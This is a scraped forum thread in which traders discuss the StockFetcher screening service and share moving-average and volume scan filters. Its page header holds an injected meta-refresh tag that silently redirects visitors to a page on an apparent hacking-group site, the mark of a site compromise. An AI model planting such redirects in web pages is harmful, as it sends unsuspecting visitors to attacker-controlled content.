Forum Index" /> <meta http-equiv="refresh" content="0;URL=http://www.turkhacks.com/dosya/heyk.html"> :: View topic - Anyone using stockfetcher?
<meta http-equiv= Forum Index" vspace="1" />
Revolutionizing Investor Psychology

FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

Anyone using stockfetcher?

Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading
View previous topic :: View next topic  
mjlewis

PostPosted: Mon Dec 31, 2007 11:03 am    Post subject: Anyone using stockfetcher? Reply with quote

I found a site called stockfetcher which seems just as powerful, if not more so, than stockcharts for scanning and chart analysis. Does anyone here use their site, and if so, how satisfied have you been?

I'm not sure whether the standard or advanced level would be better for me. Does anyone know what the "advanced filter support" item under the Advanced level means?

Thanks.
Harry

PostPosted: Mon Dec 31, 2007 5:17 pm    Post subject: stockfetcher Reply with quote

I have used stockfetcher for several months. I am satsified for the cost. I know it is not as good as the high dollar scaners but for $10.00 a month it is a steal. They have a lot of standard filters. They call scans filters. I have wrote several filters for my self but I also use several that is on the form.
I had some trouble writing some of my own filters but when I e-mail them they always e-mail me back with the solution. I have 13 saved for my own use. A person can save at least 25 or more of any kind of filters you have. I only scan for stocks. I think it depends on what you are scanning for as to the service you need.

I have wrote several different ones that I use at different times depending what is working at the time. If you decide to use the service I don't mind sharing the scans I am using. Smile

Harry
mjlewis

PostPosted: Wed Jan 02, 2008 4:50 pm    Post subject: Reply with quote

I'll try their site out for a couple of months.

I have pretty good luck with scans on stockcharts, but I'd like to do more complex scans that don't seem to work properly with their site. I also for the life of me can't figure out how to exclude closed-end funds and ETFs from my stock scans on the stockcharts site.

If you wouldn't mind sending me your scans, I'd certainly appreciate it. Very Happy
Harry

PostPosted: Thu Jan 03, 2008 8:14 am    Post subject: see if this will work Reply with quote

http://www.stockfetcher.com/stockdb/fetcher?p=myfilters
Harry

PostPosted: Thu Jan 03, 2008 8:21 am    Post subject: filters Reply with quote

I have the most success with 1, 4, 6 and 13. Some of them are duplicated. I have been trying to cut, copy and paste is the reason. This is my whole list at this time. I know that I need to delete some of them but I am always changing the wording a little so I play with some of them at times.
mjlewis

PostPosted: Fri Jan 04, 2008 5:00 pm    Post subject: Reply with quote

Hi Harry.

For some reason, I can't actually see your scans through the link you sent out. Would you mind checking it out and reposting the link?

Thanks.
Harry

PostPosted: Fri Jan 04, 2008 9:30 pm    Post subject: Reply with quote

Enable Filter Categories Global Filter On (help?) Back to My Filters
Filter Name:

show stocks where MA (Cool crossed above MA (20) and closed 1 day ago below MA(20) 1 day for the last 5 days
and price is between 2 and 50
and volume (30) is above 50000

Here is the first one.
Harry

PostPosted: Fri Jan 04, 2008 9:33 pm    Post subject: Reply with quote

Filter Name:

show stocks where MA (Cool crossed above MA (20) and closed 1 day ago below MA(20) 1 day for the last 5 days

Maybe you can read this one. Smile

I am having trouble as you can see. For some reason the smiley face keeps poping up on the MA 8.
Harry

PostPosted: Fri Jan 04, 2008 9:45 pm    Post subject: Reply with quote

Filter Name:

close is less than 5 percent above the ma (20)
price is between 2 and 50
close has been increasing for last 3 days
average volume (10) is more than 50000 and less 1000000
volume has been increasing for last 3 days
Harry

PostPosted: Fri Jan 04, 2008 9:49 pm    Post subject: Reply with quote

Closed crossed above MA (Cool and close 1 day ago below ma (Cool 1 day ago for the last 5 days

It is doing it again. The smiley faces loves me.
The first two are moving averages 8 and the last one is volume 30

I have to have the parenthesis around the numbers to make the filter work and for some reason when I copy and paste them on this thread the happy faces are showing up.

Harry
Pat
Site Admin

PostPosted: Tue Jan 08, 2008 11:34 am    Post subject: StockFetcher Candlestick Scans Reply with quote

There is a free version of StockFetcher's Candlestick Scans in the Candlestick Forum website under Free Resources.
To view a list of current stocks forming one of the Major Signals clikc on the red link "View Current Charts & Lists of Stocks for " http://www.candlestickforum.com/PPF/Parameters/16_332_/candlestick.asp
Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading All times are GMT - 5 Hours
Page 1 of 1

Jump to: